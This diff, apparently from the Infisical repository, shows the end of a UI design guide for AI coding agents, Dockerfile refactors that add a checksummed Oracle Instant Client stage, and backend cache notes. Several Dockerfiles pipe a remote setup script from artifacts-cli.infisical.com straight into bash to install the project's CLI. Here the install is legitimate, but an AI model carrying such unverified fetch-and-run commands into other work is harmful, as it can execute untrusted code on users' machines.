+| --- | --- | +| [`Separator`](frontend/src/components/v3/generic/Separator/Separator.tsx) | Horizontal/vertical divider. | +| [`ScopeIcons`](frontend/src/components/v3/platform/ScopeIcons.tsx) | `OrgIcon` / `SubOrgIcon` / `ProjectIcon` / `InstanceIcon` β€” use when intent is scope. | +| [`DocumentationLinkBadge`](frontend/src/components/v3/platform/DocumentationLinkBadge/DocumentationLinkBadge.tsx) | Inline "Documentation" link badge in `CardTitle`. | + +**Icons** β€” [`lucide-react`](https://lucide.dev). Sizing is bound by the +host component; don't override unless necessary. + +## 5. Layout Principles + +- **Page container** β€” `max-w-8xl` (88rem) centered, `bg-bunker-800`. +- **Page header** β€” `PageHeader` with scope icon + underlined `h1` + description. 
See [`PageHeader.tsx`](frontend/src/components/v2/PageHeader/PageHeader.tsx). Always set `scope` to the correct hierarchy level. +- **Section** β€” one `Card` per logical section. Title + optional `DocumentationLinkBadge` in `CardHeader`; primary action in `CardAction` (top-right). +- **Tables inside Cards** β€” filters and search sit in the `CardHeader` above the table; pagination sits in the `CardFooter` or bottom of `CardContent`. +- **Forms inside Sheets/Dialog** β€” create / edit flows open in a right-side Sheet or Dialog, never inline, never as a full-page route. Multi-step forms remain inside the Sheet. +- **Spacing rhythm** β€” `gap-1.5` (intra-element), `gap-2 / gap-3` (adjacent elements), `p-4 / p-5` (section padding). Card = `p-5 gap-5`; Sheet header/footer = `p-4`. + +## 6. Depth & Elevation + +Depth is conveyed by layered surface tones and borders. Shadows are reserved +for elements that float (Popover, DropdownMenu, Sheet). + +| Layer | Surface | Border | +| ------------------- | ------------------ | ------------- | +| Page | `bg-bunker-800` | β€” | +| Card | `bg-card` | `border-border` | +| Popover / Sheet | `bg-popover` | `border-border` + `shadow-lg` | +| Row hover | `bg-container-hover` | β€” | +| Focus | β€” | 3px ring, `--color-ring` | +| Disabled | `opacity-50 / 75`, `pointer-events-none` | β€” | + +Never add a box-shadow to a Card, Table row, or Badge; it breaks the +border-defined system. + +## 7. Do's and Don'ts + +- **DO** choose Badge and Button variants by **intent** (danger / success / + warning / info / neutral), not by color preference. +- **DO** use scope colors (`org`, `sub-org`, `project`, `admin`) to reinforce + hierarchy β€” the scope of a page, a primary button, a scope-link badge. +- **DO** mask secret values by default. Reveal must be an explicit user + action and should be logged. +- **DO** put large create / edit forms in a right-side Sheet; smaller forms can be in Dialogs. 
+- **DO** pair destructive confirmations with the resource name and the + consequence (see Β§9). +- **DO** cite tokens (`bg-card`) over hex (`#xxxxxx`) in new code. +- **DON'T** use v2 components when a v3 equivalent exists unless the existing scope is v2. +- **DON'T** add box-shadows as a depth cue β€” borders and surface tones do + that work. The exception is elements that genuinely float (Popover, + DropdownMenu, Sheet), which already include it. +- **DON'T** invent new colors. If it isn't in `index.css` `@theme`, it + doesn't belong. +- **DON'T** use `project` yellow, `org` blue, or `sub-org` green as generic + accents. They are scope signals; repurposing them creates false hierarchy. +- **DON'T** mix font families. Inter only. +- **DON'T** animate for decoration. Motion should clarify state change only. + +## 8. Voice & Content Tone + +Copy should read as if written by an engineer for another engineer: direct, +technical, specific. The domain is serious β€” secrets, access, compliance β€” +and the voice reflects that. + +### Stance + +- Direct. Active voice. Lead with the subject: "Delete this role" β€” not + "This role will be deleted". +- Specific. Name the resource, the action, the consequence. Avoid vague + verbs ("handle", "manage") when a precise verb exists (`rotate`, `revoke`, + `import`). +- Calm. No exclamation marks. No second-person cheer ("Awesome!", + "You're all set!"). No emoji. +- Honest. Never claim speed, power, or ease in UI copy ("seamless", + "powerful", "blazing-fast"). Those belong on the marketing site, not here. + +### Shapes + +- **Labels & buttons** β€” Title Case, imperative: "Add Secret", "Revoke + Access", "Rotate Key". +- **Descriptions & helper text** β€” sentence case, one short sentence. +- **Empty states** β€” state what's missing, then the next action: + "No secrets yet. Add your first secret to get started." +- **Errors** β€” name the failure and the remedy. 
Never "Something went wrong": + "Could not rotate secret β€” token lacks `secrets:write` permission." +- **Destructive confirmation** β€” name the resource and the consequence "Delete "API_KEY" β€” this cannot be undone." +- **Success toasts** β€” past tense, specific: "Secret "API_KEY" created". + +### Secrets & sensitive values + +Never include a secret's value in any user-visible copy β€” UI, logs, toasts, +errors, audit trails, or analytics. Refer to secrets by key only. Mask +tokens and keys in screenshots and docs as well. + +### Documentation links + +Use `DocumentationLinkBadge` (info variant, external-link icon). Label it +"Documentation" β€” not "Learn more", "Read docs", "See more". + +## 9. Agent Prompt Guide + +Pasteable prompt fragments for AI coding agents producing new UI. + +**Before generating UI for any component:** + +1. Open `frontend/src/components/v3/generic//.stories.tsx`. +2. Pick the `Example:` story closest to your need; mirror its composition exactly. +3. Pick the variant by reading the matching `Variant:` story's description β€” + not by color preference. + +**Adding a section to an existing page:** +> Wrap the section in a `Card` from `@app/components/v3`. Use `CardHeader` +> with `CardTitle` + optional `CardDescription` + `CardAction` for the +> top-right primary button (variant `project` on a project page). Put the +> table or content in `CardContent`. + +**A new create/edit form:** +> Put the form in a right-side `Sheet` (`Sheet`, `SheetContent`, +> `SheetHeader` with `SheetTitle` + `SheetDescription`, `SheetFooter` with +> the action buttons). Use `react-hook-form` with a Zod resolver. Each input +> is wrapped in `Field` + `FieldLabel` + `FieldContent` + `FieldError`. Primary button is +> variant is scope dependent `project`, secondary is `outline`, cancel is `ghost`. + +**A status indicator:** +> Use `Badge` from `@app/components/v3`. 
Pick the variant by intent: +> `danger` for errors or expired access, `warning` for stale or +> attention-warranting, `success` for healthy / completed, `info` for +> informational, `neutral` for disabled / empty, `project` / `org` / +> `sub-org` for scope references. Include a matching Lucide icon as the +> first child. + +**A destructive confirmation:** +> Use `AlertDialog`. Title: "Delete ``". Description: one +> sentence naming the consequence, ending with "This cannot be undone." +> Confirm button is variant `danger`. Cancel button is variant `outline`. + +**A documentation link in a section:** +> Use `DocumentationLinkBadge` from `@app/components/v3/platform`. Place it +> in the `CardTitle` next to the section name. + +**Refer to:** + +- [`Badge.stories.tsx`](frontend/src/components/v3/generic/Badge/Badge.stories.tsx) β€” canonical semantic reference for variant choice. +- [`OverviewPage`](frontend/src/pages/secret-manager/OverviewPage) β€” full-page reference (PageHeader, Card-with-table, Create Secret Sheet, filters, DropdownMenu + ButtonGroup). +- [`AccessControlPage`](frontend/src/pages/project/AccessControlPage) β€” full-page reference (permission-gated actions, `DocumentationLinkBadge`, role badges with `ClockAlertIcon` for expired access). +- Β§8 above for any user-visible copy. + +## Appendix: Iteration Guide + +1. **Run Storybook** β€” `cd frontend && npm run storybook` (port 6006). Open + Badge, Button, Card, Table, Sheet first. +2. **Read the two reference pages** β€” `OverviewPage` and `AccessControlPage` + render the full v3 vocabulary in production. +3. **Tokens live in `index.css`** β€” `@theme` block, lines 56–214. Never + introduce a hex that is not here. +4. **Adding a variant** β€” extend the `cva()` block in the component and add + a story. Keep the tint pattern (`bg-/15 border-/10` for Badge, + `bg-/10 border-/25` for Button). +5. **Never use v2 for new code** β€” unless no v3 equivalent exists. 
+ `PageHeader` is the notable v2 exception still used by all pages. +6. **Before merging** β€” `make reviewable-ui` (lint + type-check). +7. **When in doubt** β€” mirror `OverviewPage`. diff --git a/Dockerfile.fips.standalone-infisical b/Dockerfile.fips.standalone-infisical index 1d617355b5f..cbdc8ad72b6 100644 --- a/Dockerfile.fips.standalone-infisical +++ b/Dockerfile.fips.standalone-infisical @@ -55,6 +55,27 @@ USER non-root-user ## ## BACKEND ## + +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* + +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" + FROM base AS backend-build ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ @@ -117,7 +138,7 @@ RUN mkdir frontend-build # Production stage FROM base AS production -# Install necessary packages including ODBC +# Install all required runtime packages RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -137,40 +158,27 @@ RUN apt-get update && apt-get install -y \ freetds-dev \ freetds-bin \ tdsodbc \ + libaio1t64 \ + smbclient \ openssh-client \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y 
infisical=0.43.47 \ && rm -rf /var/lib/apt/lists/* -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* + ldconfig # Configure ODBC in production RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini - WORKDIR 
/openssl-build RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && tar -xf openssl-3.1.2.tar.gz \ @@ -183,9 +191,6 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && apt-get clean \ && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient && rm -rf /var/lib/apt/lists/* - # Build OpenSSL 3.5.6 for PQC (ML-DSA / SLH-DSA) certificate support. # Installed to /opt/openssl-pqc so it does not conflict with the FIPS OpenSSL above. WORKDIR /tmp/openssl-pqc-build @@ -199,11 +204,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o && cd / \ && rm -rf /tmp/openssl-pqc-build -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ - && apt-get update && apt-get install -y infisical=0.43.47 \ - && rm -rf /var/lib/apt/lists/* - RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user # Give non-root-user permission to update SSL certs diff --git a/Dockerfile.standalone-infisical b/Dockerfile.standalone-infisical index 443bd5c26b1..3532b7dae91 100644 --- a/Dockerfile.standalone-infisical +++ b/Dockerfile.standalone-infisical @@ -57,6 +57,27 @@ USER non-root-user ## ## BACKEND ## + +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* + +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + 
ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" + FROM base AS backend-build ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ @@ -87,14 +108,12 @@ RUN npm i -g tsconfig-paths ENV NODE_OPTIONS="--max-old-space-size=8192" RUN npm run build -# Production stage -FROM base AS backend-runner - -ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ +# Production dependencies (runs in parallel with backend-build) +FROM base AS backend-prod-deps WORKDIR /app -# Install all required dependencies for runtime +# Install build tools needed to compile native modules during npm ci RUN apt-get update && apt-get install -y \ python3 \ make \ @@ -106,70 +125,63 @@ RUN apt-get update && apt-get install -y \ freetds-dev \ && rm -rf /var/lib/apt/lists/* +COPY backend/package*.json ./ +RUN npm ci --omit=dev + +# Production stage +FROM base AS backend-runner + +ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/ + +WORKDIR /app + +# Only runtime libraries needed β€” no compilation happens here +RUN apt-get update && apt-get install -y \ + unixodbc \ + freetds-bin \ + && rm -rf /var/lib/apt/lists/* + # Configure ODBC RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini COPY --from=backend-build /app . 
RUN rm -rf ./node_modules ./bdd ./e2e-test -RUN npm ci --omit=dev +COPY --from=backend-prod-deps /app/node_modules ./node_modules RUN mkdir frontend-build # Production stage FROM base AS production +# Runtime dependencies + build tools needed for PQC OpenSSL build RUN apt-get update && apt-get install -y \ - build-essential \ - autoconf \ - automake \ - libtool \ - libssl-dev \ ca-certificates \ bash \ curl \ git \ - python3 \ - make \ - g++ \ unixodbc \ freetds-bin \ - unixodbc-dev \ - libc-dev \ - freetds-dev \ wget \ perl \ + build-essential \ + libssl-dev \ openssh-client \ + libaio1t64 \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.47 \ && rm -rf /var/lib/apt/lists/* -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 
unzip && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* - -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient && rm -rf /var/lib/apt/lists/* + ldconfig # Build OpenSSL 3.5.6 for PQC (ML-DSA / SLH-DSA) certificate support. # Installed to /opt/openssl-pqc so it does not conflict with the system OpenSSL. @@ -184,11 +196,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o && cd / \ && rm -rf /tmp/openssl-build -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ - && apt-get update && apt-get install -y infisical=0.43.47 \ - && rm -rf /var/lib/apt/lists/* - WORKDIR / # Configure ODBC in production @@ -199,12 +206,10 @@ RUN groupadd --system --gid 1001 nodejs \ && useradd --system --uid 1001 --gid nodejs non-root-user # Give non-root-user permission to update SSL certs -RUN chown -R non-root-user /etc/ssl/certs -RUN chown non-root-user /etc/ssl/certs/ca-certificates.crt -RUN chmod -R u+rwx /etc/ssl/certs -RUN chmod u+rw /etc/ssl/certs/ca-certificates.crt -RUN chown non-root-user /usr/sbin/update-ca-certificates -RUN chmod u+rx /usr/sbin/update-ca-certificates +RUN chown -R non-root-user /etc/ssl/certs \ + && chmod -R u+rwx /etc/ssl/certs \ + && chown non-root-user /usr/sbin/update-ca-certificates \ + && chmod u+rx /usr/sbin/update-ca-certificates ## set pre baked keys ARG POSTHOG_API_KEY @@ -229,6 +234,21 @@ ENV DD_GIT_REPOSITORY_URL $DD_GIT_REPOSITORY_URL ARG DD_GIT_COMMIT_SHA ENV DD_GIT_COMMIT_SHA $DD_GIT_COMMIT_SHA +# OCI Image 
Labels - Static metadata +# See: https://github.com/opencontainers/image-spec/blob/main/annotations.md +LABEL org.opencontainers.image.title="Infisical" +LABEL org.opencontainers.image.description="Open-source secret management platform" +LABEL org.opencontainers.image.url="https://infisical.com" +LABEL org.opencontainers.image.documentation="https://infisical.com/docs" +LABEL org.opencontainers.image.source="https://github.com/Infisical/infisical" +LABEL org.opencontainers.image.vendor="Infisical" +LABEL org.opencontainers.image.licenses="MIT" +LABEL org.opencontainers.image.base.name="node:22.22.0-trixie-slim" + +# OCI Image Labels - Dynamic metadata (set via build args) +LABEL org.opencontainers.image.version="${INFISICAL_PLATFORM_VERSION}" +LABEL org.opencontainers.image.revision="${DD_GIT_COMMIT_SHA}" + ENV PORT 8080 ENV HOST=0.0.0.0 ENV HTTPS_ENABLED false diff --git a/backend/.gitignore b/backend/.gitignore index 00425e090d9..dbb2683fb46 100644 --- a/backend/.gitignore +++ b/backend/.gitignore @@ -1,3 +1,4 @@ dist +.cache /wallet diff --git a/backend/CLAUDE.md b/backend/CLAUDE.md index a38752b0214..e525ad3114d 100644 --- a/backend/CLAUDE.md +++ b/backend/CLAUDE.md @@ -88,7 +88,7 @@ Services live in `src/services/` (100+ modules). Each typically contains: Routes use Fastify's Zod type provider β€” schemas auto-generate OpenAPI docs. Each route specifies: `method`, `url`, `config.rateLimit` (using `readLimit` or `writeLimit` presets), `schema` (Zod schemas with `operationId` for OpenAPI), `onRequest: verifyAuth([AuthMode.*])`, and a `handler` that accesses business logic via `server.services.*`. -See `src/server/routes/v3/user-router.ts` for a representative router file. +See `src/server/routes/v4/secret-router.ts` for a representative router file. ### Auth System @@ -124,6 +124,15 @@ Uses CASL (`@casl/ability`) with MongoDB-style rules. Permission logic lives in Built-in roles: `Admin`, `Member`, `Viewer`, `NoAccess`. 
Custom roles use unpacked CASL rules stored in the database. Rules can include conditions with operators `$IN`, `$EQ`, `$NEQ`, `$GLOB` (for pattern matching like `prod-*`). See `PermissionConditionSchema` in `permission-types.ts`. +**Project permission caching** uses a fingerprint-based two-tier cache (`withCacheFingerprint` in `src/lib/cache/with-cache.ts`): +- **Short-lived marker** (10s TTL) in Redis β€” while present, cached data is served with 0 DB reads. +- **Long-lived data payload** (10m TTL) in Redis β€” holds the full permission blob plus a fingerprint hash. +- On marker expiry, a lightweight **fingerprint query** (`getPermissionFingerprint` in `permission-dal.ts`) runs (1 DB read). If the fingerprint matches the cached payload, the marker is reset; otherwise, a full data re-fetch occurs. +- The fingerprint covers **both project-scoped and org-scoped** memberships for the actor, so org-level changes (e.g. SSO bypass grant/revoke, org role edits) also trigger cache invalidation. +- `filterTemporary` in `flattenActiveRolesFromMemberships` runs on every request as a real-time safety net β€” it filters out expired temporary access regardless of cache state, so access revocation for timed roles/privileges is immediate. +- **No explicit cache invalidation calls exist.** The fingerprint self-corrects within the marker TTL (10s eventual consistency for access granting). The old `invalidateProjectPermissionCache` / DAL version counter pattern has been removed. +- Cache helpers (`cacheGet`, `cacheSet`, `applyReviver`) in `src/lib/cache/with-cache.ts` are shared between the simple `withCache` and the fingerprint-based `withCacheFingerprint`. + ### Request-Scoped Memoization A per-request in-memory cache that eliminates redundant DB reads within a single HTTP request. Defined in `src/lib/request-context/request-memoizer.ts`, attached to Fastify's `@fastify/request-context` as the `memoizer` field (initialized in `src/server/app.ts`). 
Cache is automatically garbage-collected when the request ends β€” zero staleness risk, zero infrastructure. diff --git a/backend/Dockerfile b/backend/Dockerfile index ad555bb8d68..4feea997d8c 100644 --- a/backend/Dockerfile +++ b/backend/Dockerfile @@ -3,90 +3,101 @@ FROM node:22.22.0-trixie-slim AS build WORKDIR /app -# Required for pkcs11js +# Required for pkcs11js and TDS driver (SAP ASE dynamic secrets) RUN apt-get update && apt-get install -y \ python3 \ make \ g++ \ openssh-client \ - openssl - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + openssl \ unixodbc \ freetds-bin \ freetds-dev \ unixodbc-dev \ - libc-dev + libc-dev \ + && rm -rf /var/lib/apt/lists/* COPY package*.json ./ -RUN npm ci --only-production +RUN npm ci COPY . . RUN npm run build -# Production stage -FROM node:22.22.0-trixie-slim -WORKDIR /app +# Oracle Instant Client (parallel stage β€” downloads while other stages build) +FROM debian:trixie-slim AS oracle +RUN apt-get update && apt-get install -y unzip wget ca-certificates \ + && rm -rf /var/lib/apt/lists/* -ENV npm_config_cache /home/node/.npm +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "amd64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5"; \ + elif [ "$ARCH" = "arm64" ]; then \ + ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ + EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32"; \ + fi && \ + ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ + wget -q "$ORACLE_URL" && \ + echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ + mkdir -p /opt/oracle && \ + unzip "$ORACLE_ZIP" -d /opt/oracle && \ + rm "$ORACLE_ZIP" -COPY package*.json ./ +# Production dependencies (runs in parallel with build) +FROM node:22.22.0-trixie-slim AS prod-deps + +WORKDIR /app +# 
Build tools needed to compile native modules during npm ci RUN apt-get update && apt-get install -y \ python3 \ make \ - g++ - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + g++ \ unixodbc \ freetds-bin \ freetds-dev \ unixodbc-dev \ - libc-dev + libc-dev \ + && rm -rf /var/lib/apt/lists/* + +COPY package*.json ./ +RUN npm ci --omit=dev + +# Production stage +FROM node:22.22.0-trixie-slim +WORKDIR /app + +ENV npm_config_cache /home/node/.npm + +# Only runtime dependencies β€” no compilation happens here +RUN apt-get update && apt-get install -y \ + unixodbc \ + freetds-bin \ + libaio1t64 \ + smbclient \ + curl \ + bash \ + git \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini -# Install Oracle Instant Client for OracleDB mTLS wallet support +# Copy Oracle Instant Client from parallel stage +COPY --from=oracle /opt/oracle /opt/oracle RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "amd64" ]; then \ - ORACLE_ZIP="instantclient-basic-linux.x64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="d6c79cbcf0ff209363e779855c690d4fc730aed847e9198a2c439bcf34760af5" && \ - apt-get update && apt-get install -y libaio1t64 unzip wget && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ elif [ "$ARCH" = "arm64" ]; then \ - 
ORACLE_ZIP="instantclient-basic-linux.arm64-23.26.0.0.0.zip" && \ - ORACLE_URL="https://download.oracle.com/otn_software/linux/instantclient/2326000/${ORACLE_ZIP}" && \ - EXPECTED_SHA="9c9a32051e97f087016fb334b7ad5c0aea8511ca8363afd8e0dc6ec4fc515c32" && \ - apt-get update && apt-get install -y libaio1t64 unzip wget && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1 && \ - wget -q "$ORACLE_URL" && \ - echo "$EXPECTED_SHA $ORACLE_ZIP" | sha256sum -c - && \ - unzip "$ORACLE_ZIP" -d /opt/oracle && \ - rm "$ORACLE_ZIP"; \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ fi && \ echo /opt/oracle/instantclient_23_26 > /etc/ld.so.conf.d/oracle-instantclient.conf && \ - ldconfig && \ - rm -rf /var/lib/apt/lists/* - -RUN npm ci --only-production && npm cache clean --force + ldconfig COPY --from=build /app . -RUN rm -rf ./bdd ./e2e-test - -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN apt-get update && apt-get install -y curl bash && \ - curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && apt-get install -y infisical=0.43.14 git +RUN rm -rf ./node_modules ./bdd ./e2e-test +COPY --from=prod-deps /app/node_modules ./node_modules HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \ CMD node healthcheck.js diff --git a/backend/Dockerfile.dev b/backend/Dockerfile.dev index a072ce5a9f8..67c1e762a6f 100644 --- a/backend/Dockerfile.dev +++ b/backend/Dockerfile.dev @@ -7,7 +7,7 @@ ARG SOFTHSM2_VERSION=2.5.0 ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \ SOFTHSM2_SOURCES=/tmp/softhsm2 -# Install build dependencies including python3 (required for pkcs11js and partially TDS driver) +# Install all build and runtime dependencies RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -24,26 +24,27 @@ RUN apt-get update && apt-get install -y \ wget \ perl \ pkg-config \ - 
